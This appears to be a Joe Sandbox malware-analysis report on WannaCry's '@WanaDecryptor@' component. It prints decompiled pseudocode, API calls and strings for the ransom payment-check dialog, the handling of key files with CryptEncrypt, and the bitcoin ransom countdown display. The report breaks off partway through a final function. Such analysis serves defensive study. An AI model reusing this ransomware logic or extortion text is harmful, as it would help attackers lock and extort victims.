\AppData\Local\Temp, xrefs: 00402BB5
\WINDOWS, xrefs: 00402B67
\ProgramData, xrefs: 00402B4D
Temporary Internet Files, xrefs: 00402C07
This folder protects against ransomware. Modifying it will reduce protection, xrefs: 00402BED
\Local Settings\Temp, xrefs: 00402BCF
Content.IE5, xrefs: 00402C21
\Program Files, xrefs: 00402B81

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _wcsicmp$_wcsnicmpwcsstr
String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
API String ID: 2817753184-2613825984
Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}

0x00401766
0x00401768
0x0040176d
0x0040176e
0x00401775
0x0040177e
0x00401780
0x00401785
0x0040178f
0x00401797
0x004017a5
0x004017b2
0x004017b2
0x004017b8
0x004017c3
0x0040193e
0x00401948
0x00401955
0x004017c9
0x004017c9
0x004017d2
0x004018f9
0x0040192f
0x00000000
0x00000000
0x00401931
0x00401932
0x00401934
0x00401939
0x00401939
0x00000000
0x00401939
0x00401901
0x0040191f
0x0040191f
0x00401920
0x00401925
0x00000000
0x00401925
0x00401903
0x00401909
0x0040190f
0x00401913
0x00000000
0x00000000
0x00401915
0x00401916
0x00401918
0x00000000
0x00401918
0x004017e3
0x004017e7
0x004017e9
0x004017eb
0x004017fa
0x00401801
0x00401803
0x00401810
0x00401811
0x00401821
0x00401827
0x00401829
0x0040182e
0x004018da
0x004018db
0x004018e0
0x004018e5
0x004018ea
0x00401834
0x00401844
0x0040184d
0x0040185b
0x00401863
0x00401870
0x00401873
0x00401877
0x0040187f
0x0040187f
0x00401885
0x00401892
0x00401893
0x00401894
0x00401895
0x0040189c
0x004018a1
0x004018a3
0x004018a4
0x004018a6
0x004018a7
0x004018af
0x004018b8
0x004018bf
0x004018c8
0x004018d3
0x004018d3
0x00000000
0x0040182e

APIs

#6453.MFC42 ref: 00401780
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
TerminateThread.KERNEL32(?,00000000), ref: 004017A5
CloseHandle.KERNEL32(?), ref: 004017B2
sprintf.MSVCRT ref: 00401811
fopen.MSVCRT ref: 00401821
fread.MSVCRT ref: 00401844
fclose.MSVCRT ref: 0040184D
DeleteFileA.KERNEL32(?), ref: 0040185B
#537.MFC42(You have a new message:), ref: 00401885
#924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
#1200.MFC42 ref: 004018AF
#800.MFC42 ref: 004018BF
#800.MFC42 ref: 004018D3
#1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5

Strings

Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
%08X.dky, xrefs: 0040180A
You have a new message:, xrefs: 00401877

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
API String ID: 2207195628-1375496427
Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}

0x004012e6
0x004012e8
0x004012ed
0x004012ee
0x004012fb
0x00401305
0x00401307
0x00401316
0x00401316
0x00401323
0x00401339
0x0040133b
0x00401343
0x00401349
0x0040134e
0x004013b0
0x004013be
0x004013d3
0x004013db
0x004013dd
0x004013e0
0x004013e2
0x00401405
0x00401408
0x0040141c
0x00401427
0x00401440
0x00401459
0x0040145b
0x0040145e
0x00401460
0x00401481
0x00401484
0x0040148a
0x0040149e
0x004014a8
0x004014aa
0x004014ac
0x004014c1
0x004014d4
0x004014da
0x004014dc
0x004014df
0x004014e1
0x00401502
0x00401507
0x0040150d
0x00401513
0x00401520
0x00401525
0x0040152d
0x0040153e
0x0040153f
0x00401547
0x00401548
0x00401556
0x00401557
0x0040155f
0x00401567
0x0040156e
0x0040156f
0x00401570
0x00401575
0x0040157a
0x0040157f
0x00401581
0x00401587
0x004015a2
0x004015a9
0x004015ae
0x004015b0
0x004015be
0x004015b2
0x004015b2
0x004015b2
0x004015c4
0x004015cf
0x00000000
0x004015cf
0x004014e3
0x004014e3
0x004014e3
0x00401462
0x00401462
0x00401462
0x004013e4
0x004013e4
0x004013e4
0x00401350
0x00401354
0x00401367
0x00401379
0x0040139a
0x004013a4
0x004013ab
0x00000000
0x0040137b
0x0040137b
0x00401385
0x0040138c
0x004015d3
0x004015d3
0x004015d3
0x00401379
0x004015e3
0x004015f0

APIs

sprintf.MSVCRT ref: 00401323
sprintf.MSVCRT ref: 00401339
GetFileAttributesA.KERNEL32(?), ref: 00401343
DeleteFileA.KERNEL32(?), ref: 0040139A
fread.MSVCRT ref: 00401405
fclose.MSVCRT ref: 00401408
sprintf.MSVCRT ref: 00401440
fopen.MSVCRT ref: 00401453

Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A

fopen.MSVCRT ref: 004013D5

Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658

Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB

Strings

%08X.res, xrefs: 0040143A
%08X.pky, xrefs: 0040131D
s.wnry, xrefs: 0040151B
00000000.res, xrefs: 004013CE
%08X.dky, xrefs: 00401333
%08X.eky, xrefs: 004014BB

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
API String ID: 2787528210-4016014174
Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56

Uniqueness

Uniqueness Score: -1.00%

Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

0x004076a0
0x004076a2
0x004076a7
0x004076ad
0x004076ae
0x004076b5
0x004076be
0x004076c1
0x004076c3
0x004076c7
0x004076cb
0x004076cf
0x004076d3
0x004076d9
0x004076da
0x004076e0
0x004076e6
0x004076e8
0x004076ed
0x004076f1
0x004076f5
0x004076fa
0x004076fe
0x0040770c
0x00407712
0x00407712
0x00407714
0x0040771e
0x00407716
0x00407716
0x00407716
0x00407730
0x00407736
0x0040773b
0x0040775b
0x0040773d
0x0040773f
0x00407741
0x00407745
0x0040774f
0x00407747
0x0040774a
0x0040774b
0x0040774b
0x00407755
0x00407757
0x00407757
0x00407755
0x00407761
0x0040776d
0x00407763
0x00407763
0x00407767
0x00407767
0x00407784
0x0040778d
0x004077aa
0x004077bf
0x004077c8
0x004077d6
0x004077e6
0x0040780e
0x00407814
0x00407819
0x0040782c
0x00407832
0x0040781b
0x0040781f
0x00407820
0x00407820
0x00407833
0x00407838
0x0040783c
0x004076d7
0x00000000
0x004076d7
0x0040785b
0x00407870
0x00407876
0x0040787f
0x0040788a
0x00407892
0x00407894
0x00407896
0x00407896
0x004078a0
0x004078a8
0x004078db
0x004078df
0x004078e3
0x004078e7
0x004078e8
0x004078e9
0x004078ef
0x004078f4
0x004078f5
0x004078fa
0x00407901
0x00407902
0x00407903
0x00407908
0x00407909
0x0040790e
0x004078aa
0x004078aa
0x004078af
0x004078b7
0x004078b8
0x004078bd
0x004078be
0x004078c3
0x004078ca
0x004078cb
0x004078d0
0x004078d1
0x004078d6
0x004078d6
0x00407917
0x00407918
0x0040791d
0x00407924
0x00407929
0x0040792f
0x0040793e
0x00407942
0x00407947
0x00407950
0x0040795a
0x0040796c
0x00407973
0x00407984
0x0040798b
0x0040798b
0x00407950
0x00407994
0x0040799f
0x004079af
0x004079bc

APIs

time.MSVCRT ref: 004076DA
sprintf.MSVCRT ref: 0040780E
SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
#540.MFC42 ref: 00407876
_ftol.MSVCRT ref: 004078AA
#2818.MFC42(?,$%d,00000000), ref: 004078BE
#2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
#2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
#2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
#3092.MFC42(00000402,?), ref: 0040791D
#6199.MFC42(00000402,?), ref: 00407924
InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
#800.MFC42 ref: 0040799F

Strings

Send %.1f BTC to this address:, xrefs: 00407903
00;00;00;00, xrefs: 004076E8
%02d;%02d;%02d;%02d, xrefs: 00407808
Send $%d worth of bitcoin to this address:, xrefs: 004078CB
$%d, xrefs: 004078B8
%.1f BTC, xrefs: 004078EF

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
API String ID: 993288296-3256873439
Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96

Uniqueness

Uniqueness Score: -1.00%

Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
